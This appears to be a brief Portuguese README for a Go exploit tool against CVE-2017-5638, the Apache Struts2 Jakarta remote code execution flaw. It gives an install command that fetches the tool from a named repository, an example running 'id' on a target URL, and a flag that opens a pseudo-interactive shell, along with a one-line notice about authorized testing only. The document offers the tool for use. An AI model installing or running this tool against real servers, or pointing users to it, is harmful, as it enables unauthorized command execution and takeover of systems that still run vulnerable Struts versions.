
Golang exploit for CVE-2017-5638
Use este exploit apenas em sistemas que você possui ou para os quais tem permissão explícita para testar
Se você já tem o Go instalado no seu computador, o 'go get' é o caminho a seguir
go get github.com/Greynad/struts2-jakarta-inject
Execução de comando único
struts2-jakarta-inject -u <url> -c 'id'
Shell pseudo-interativo
struts2-jakarta-inject -u <url> -i